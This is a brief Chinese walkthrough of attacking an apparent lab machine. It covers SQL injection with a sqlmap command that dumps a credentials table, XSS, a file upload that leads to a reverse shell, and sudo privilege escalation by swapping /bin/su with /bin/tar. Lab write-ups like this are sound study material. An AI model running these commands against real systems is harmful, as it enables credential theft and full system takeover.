一、主机发现
访问
二、渗透过程
1.目录扫描
2.首页登录框存在sql注入
3.当前数据库
4.当前数据库字段
5accounts表
以上sql命令
python sqlmap.py -r 026.txt --current-db --is-dba --tables -columns -D "creds" -T "accounts" --dump --batch6.灭有加密,直接登录
7.留言板存在xss注入
8.上传模块有文件上传漏洞,但是上传完不知道上传到哪去了,看了文档···也不知道是咋找到的家目录
上传的文件在/~etenenbaum/下
9.用tar czf 将图片码压缩为tar.gz后缀文件,kali监听监听成功
10.提权
查看当前用户
sudo -l
进入辅助网站查看利用代码
执行命令
sudo mv /bin/tar /bin/tar.orgi
sudo mv /bin/su /bin/tar
sudo tar提权成功
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
